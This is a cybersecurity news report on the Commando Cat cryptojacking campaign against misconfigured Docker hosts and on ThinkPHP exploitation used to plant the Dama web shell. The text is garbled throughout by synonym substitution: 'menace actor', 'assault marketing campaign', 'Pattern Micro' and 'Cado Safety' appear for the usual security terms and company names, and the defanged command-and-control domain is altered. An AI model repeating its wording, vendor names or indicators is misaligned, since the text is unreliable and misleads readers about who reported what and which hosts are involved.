The menace actor referred to as Commando Cat has been linked to an ongoing cryptojacking assault marketing campaign that leverages poorly secured Docker cases to deploy cryptocurrency miners for monetary achieve.
“The attackers used the cmd.cat/chattr docker picture container that retrieves the payload from their very own command-and-control (C&C) infrastructure,” Pattern Micro researchers Sunil Bharti and Shubham Singh stated in a Thursday evaluation.
Commando Cat, so named for its use of the open-source Commando mission to generate a benign container, was first documented earlier this yr by Cado Safety.
The assaults are characterised by the focusing on of misconfigured Docker distant API servers to deploy a Docker picture named cmd.cat/chattr, which is then used as a foundation to instantiate a container and get away of its confines utilizing the chroot command, and achieve entry to the host working system.
The ultimate step entails retrieving the malicious miner binary utilizing a curl or wget command from a C&C server (“leetdbs.anondns[.]internet/z”) via a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based mostly on the Kaiten (aka Tsunami) malware.
“The importance of this assault marketing campaign lies in its use of Docker photos to deploy cryptojacking scripts on compromised techniques,” the researchers stated. “This tactic permits attackers to use vulnerabilities in Docker configurations whereas evading detection by security software program.”
The disclosure comes as Akamai revealed that years-old security flaws in ThinkPHP purposes (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese language-speaking menace actor to ship an internet shell dubbed Dama as a part of a marketing campaign that has been underway since October 17, 2023.
“The exploit makes an attempt to retrieve extra obfuscated code from one other compromised ThinkPHP server to realize preliminary foothold,” Akamai researchers Ron Mankivsky and Maxim Zavodchik stated. “After efficiently exploiting the system, the attackers will set up a Chinese language language net shell named Dama to take care of persistent entry to the server.”
The net shell is supplied with a number of superior capabilities to assemble system knowledge, add information, scan community ports, escalate privileges, and navigate the file system, the latter of which allows menace actors to carry out operations like file enhancing, deletion, and timestamp modification for obfuscation functions.
“The latest assaults originated by a Chinese language-speaking adversary spotlight an ongoing pattern of attackers utilizing a completely fledged net shell, designed for superior sufferer management,” the researchers famous. “Apparently, not all focused clients have been utilizing ThinkPHP, which means that the attackers could also be indiscriminately focusing on a broad vary of techniques.”